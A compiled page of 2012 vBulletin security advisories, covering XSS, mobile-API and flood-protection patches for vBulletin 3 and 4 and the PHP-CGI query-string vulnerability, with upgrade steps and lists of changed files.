vBulletin vBulletin Security News

Security Vulnerabilities Found in Popular vBulletin Addons.
Source: vBulletin.com

We have recently been made aware of an XSS vulnerability affecting Lite and Pro versions of vBShout v6.0.3 and lower. Dragonbyte Tech has released vBShout v6.0.4 to address this issue.

You can read more about the issue here: http://www.dragonbyte-tech.com/f77/v...ease-6831-new/

vBulletin Security Patch for vBulletin 4.1.4 - 4.1.11 for Suite & Forum - 03/23/2012
Source: vBulletin.com

A recent vBulletin 4 (4.1.4 - 4.1.11 Suite & Forum) report indicated that there was a potential XSS exploit vector in the editor. Once the cause of the issue was isolated, code changes were made to eliminate the reported threat.

The issue does not affect vBulletin 3.x and vBulletin 4.0 - 4.1.3.

This patch has been issued for vBulletin 4.1.4 through 4.1.11.

To improve the security of your vBulletin 4 Suite installation please download the patch from the members area of vBulletin: http://members.vbulletin.com/
We recommend you install this security patch as soon as possible.

The upgrade process is the same as previous patch level releases - simply download the patch from the Members Area, extract the files and upload to your web server, overwriting the existing files. There is no upgrade script required.

Advanced Users - Files updated in the patch are:

• includes/version_vbulletin.php
• clientscript/ckeplugins/bbcode/plugin.js (if js uncompressed)
• clientscript/ckeditor/ckeditor.js" (if js compressed)

Please note that this issue and fix affects BOTH vBulletin SUITE and FORUM.

vBulletin 3.x MAPI Plugin 1.4.3 released with security patch - 04/23/2012
Source: vBulletin.com

To support the upcoming release of vBulletin Mobile Suite 1.3, which contains vBulletin's iOS Mobile App 1.3 and Android Mobile App 1.3, we have released vBulletin 3.x MAPI Plugin 1.4.3. This release contains nine changes required to fix existing mobile app issues on forums running vBulletin 3. A security patch has been included to improve the security of the vBulletin 3.x MAPI plugin as the result of a recent internal security review. Although no exploits have been reported, we urge our customers to upgrade as soon as possible.

vBulletin 3 customers should not upgrade unless they have the vBulletin Mobile Suite.

vBulletin 3.x MAPI Plugin 1.4.3 is compatible with vBulletin 3.7.5+. vBulletin Blogs customers must have Blogs 2.0.4 installed before upgrading to 3.x MAPI Plugin 1.4.3. Please visit your vBulletin Members Area to download it.

The following additional steps need to be taken after upgrade to vBulletin 3.x MAPI Plugin 1.4.3.

1. Download the "API-Log-Clean.xml" attached to this thread. (Included in the do_not_upload folder for full installs.)
2. Import "API-Log-Clean.xml" using the "Manage Products" interface in the "Plugins & Products" section of your Admin CP. The cleanup script will run on install. AdminCP -> Plugins & Products -> Manage Products -> Add/Import Product
3. Delete "API-Log-Clean" using the "Product Manager" option in the "Plugins & Products" section of your Admin CP. (Optional. The product is automatically disabled after the script runs.)

Discuss the vBulletin 3.x MAPI Plugin 1.4.3 release - HERE
Attached Files

• API-Log-Clean.xml‎ (1.9 KB)

vBulletin Security Patch for vBulletin 4.1.2 - 4.1.11 for Suite & Forum - 04/23/2012
Source: vBulletin.com

vBulletin has released a security patch to improve the security of the vBulletin 4 MAPI (4.1.2 - 4.1.11 Suite & Forum) as the result of a recent internal security review. Although no exploits have been reported, we urge our customers to upgrade as soon as possible.

The changes do not affect vBulletin 4.0.0 - 4.1.1.

This patch has been issued for vBulletin 4.1.2 through 4.1.11. A separate PL1 has been issued for vBulletin 4.1.12.

These MAPI security improvements have been added for vBulletin 3.x with the release of 3.x MAPI 1.4.3.

To improve the security of your vBulletin 4 installation, please download the patch from the members area of vBulletin: http://members.vbulletin.com/

The upgrade process is slightly more complicated for this patch level release.

1. Download the latest PL for your vBulletin 4.1.2 - 4.1.11 install from https://members.vbulletin.com.
2. Upload the patch do your server.
3. Unzip the patch to your vBulletin 4 install directory. (Ex. /var/www/html/myforum)
4. Download the "API-Log-Clean.xml" attached to this thread. (Included in the do_not_upload folder for full installs.)
5. Import "API-Log-Clean.xml" using the "Manage Products" interface in the "Plugins & Products" section of your Admin CP. The cleanup script will run on install. AdminCP -> Plugins & Products -> Manage Products -> Add/Import Product
6. Delete "API-Log-Clean" using the "Product Manager" option in the "Plugins & Products" section of your Admin CP. (Optional. The product is automatically disabled after the script runs.)

Advanced Users - Files updated in the patch are:

• includes/init.php

Please note that this issue and fix affects BOTH vBulletin 4 SUITE and FORUM.

Discuss the security patch - HERE
Attached Files

• API-Log-Clean.xml‎ (1.9 KB)

vBulletin Security Patch for vBulletin 4.1.12 for Suite & Forum - 04/23/2012
Source: vBulletin.com

vBulletin has released a security patch to improve the security of the vBulletin 4 MAPI for 4.1.12 Suite & Forum as the result of a recent internal security review. Although no exploits have been reported, we urge our customers to upgrade as soon as possible.

The changes do not affect vBulletin 4.0.0 - 4.1.1.

This patch has been issued for vBulletin 4.1.12. A separate set of patches have been issued for vBulletin 4.1.2 - 4.1.11.

The MAPI security improvements have been added for vBulletin 3.x with the release of 3.x MAPI 1.4.3.

To improve the security of your vBulletin 4 installation, please download the patch from the members area of vBulletin: http://members.vbulletin.com/

In addition to the security improvements, we've resolved the following 4.1.12 issues.

• VBIV-14742 - Push notifications broken in FR 4.1.12 add-on.
• VBIV-14685 - Tag in static page cause Fatal error on page with General Search widget set to return Static Pages
• VBIV-14663 - Quoting doesn't work in the mobile style
• VBIV-14660 - Static HTML in CMS always displays all content
• VBIV-14754 - unset($VB_API_PARAMS_TO_VERIFY['vbseourl']) to match vB3 MAPI change.
• VBIV-14681 - HTML is stripped from article previews
• VBIV-14667 - Category pages do not load if using basic/advanced friendly URLs

The upgrade process is slightly more complicated for this patch level release.

1. Download PL1 for vBulletin 4.1.12 from https://members.vbulletin.com.
2. Upload the patch do your server.
3. Unzip the patch to your vBulletin 4 install directory. (Ex. /var/www/html/myforum)
4. Run ./install/upgrade.php. (Required for 4.1.12.)
5. Download the "API-Log-Clean.xml" attached to this thread. (Included in the do_not_upload folder for full installs.)
6. Import "API-Log-Clean.xml" using the "Manage Products" interface in the "Plugins & Products" section of your Admin CP. The cleanup script will run on install. AdminCP -> Plugins & Products -> Manage Products -> Add/Import Product
7. Delete "API-Log-Clean" using the "Product Manager" option in the "Plugins & Products" section of your Admin CP. (Optional. The product is automatically disabled after the script runs.)

Advanced Users - Files updated in the patch are:

• /api.php
• /forumrunner/push.php
• /includes/class_friendly_url.php
• /includes/init.php
• /install/vbulletin-mobile-style-blog.xml
• /install/vbulletin-mobile-style.xml
• /packages/vbcms/content/phpeval.php
• /packages/vbcms/content/staticpage.php
• /packages/vbcms/item/content/article.php
• /packages/vbcms/item/content/phpeval.php
• /packages/vbcms/search/result/staticpage.php

Please note that this issue and fix affects BOTH vBulletin 4 SUITE and FORUM.

Discuss the security patch - HERE
Discuss vBulletin 4.1.12 - HERE
Attached Files

• API-Log-Clean.xml‎ (1.9 KB)

PHP-CGI query string parameter vulnerability
Source: vBulletin.com

A vulnerability has been found in PHP installations accessed via CGI where an attacker can gain access to command line parameters of PHP and access the server through this vulnerability. This can allow them to manipulate websites outside the standard operating procedure. According to the report, servers set up to use FastCGI are not vulnerable. FastCGI is the recommended method of installing PHP today. However a lot of servers continue to use the CGI method of calling PHP.

To see if your server uses CGI or FastCGI, look at your PHP Info (Maintenance -> View PHP Info) in your Admin Control Panel. The first table should have an entry for Server API. This should say "CGI/FASTCGI". If it only says "CGI" then you should contact your host so they can update the server to use FastCGI.

PHP has released PHP 5.3.12 and 5.4.2 to try and counteract this issue but experts say it isn't adequate.

For more information please see:
http://www.kb.cert.org/vuls/id/520827
http://www.h-online.com/open/news/it...2-1567532.html
http://www.h-online.com/security/new...e-1568454.html

vBulletin Security Patch for vBulletin 3.8.7 & 4.0 - 4.2 (Suite & Forum) - 06/07/2012
Source: vBulletin.com

A recent vBulletin report indicated that there was a potential exploit vector in flood protection. Once the cause of the issue was isolated, code changes were made to eliminate the reported threat.

This issue affects BOTH vBulletin 3 and vBulletin 4 (Suite & Forum).

A patch has been issued for vBulletin 3.8.7 through 4.2.

To improve the security of your vBulletin 4 installation, please download the patch from the members area of vBulletin: http://members.vbulletin.com/

The standard upgrade process for a patch level release is:

1. Download the patch for the version of vBulletin you're currently running from https://members.vbulletin.com/patches.php.
2. Extract the vBulletin patch files from the zip file.
3. Upload the patch files to your server, overwriting the old files.

Advanced Users:

Files updated in the patch for vBulletin 3.8.7 * 4.0 - 4.1.12 (Suite & Forum).

• includes/class_dm_threadpost.php
• includes/class_floodcheck.php
• includes/version_vbulletin.php

Files updated in the patch for vBulletin 4.2 (Suite & Forum).

• includes/adminfunctions.php
• includes/class_dm_threadpost.php
• includes/class_floodcheck.php
• includes/class_upgrade_420a1.php
• install/init.php
• install/mysql-schema.php
• vb/activitystream/populate/forum/thread.php
• includes/version_vbulletin.php

Licensed customers can discuss the security patch - HERE

Special thanks to cellarius, Andreas, s.molinari, and the vBulletin Germany team.

vBulletin Security Patch for vBulletin 4.2 (Suite & Forum) Only - 06/18/2012
Source: vBulletin.com

A recent vBulletin report indicated that there was a potential XSS exploit vector involving the new Activity Stream. Once the cause of the issue was isolated, code changes were made to eliminate the reported threat.

This issue affects ONLY vBulletin 4.2 (Suite & Forum).

A patch has been issued for vBulletin 4.2.

To improve the security of your vBulletin 4 installation, please download the patch from the members area of vBulletin: http://members.vbulletin.com/

The standard upgrade process for a patch level release is:

1. Download the patch for the version of vBulletin you're currently running from https://members.vbulletin.com/patches.php.
2. Extract the vBulletin patch files from the zip file.
3. Upload the patch files to your server, overwriting the old files.

The upgrade.php script does not need to be run.

Advanced Users:
Files updated in this patch for vBulletin 4.2 (Suite & Forum).

• /vb/activitystream/view/perm/calendar/event.php
• /includes/vbulletin_version.php

Please note this list does not contain the files changed in vBulletin 4.2 PL1. Only the files changed in vBulletin 4.2 PL2 are listed. However, PL2 also contains all of the changes from PL1.

Licensed customers can discuss the security patch - HERE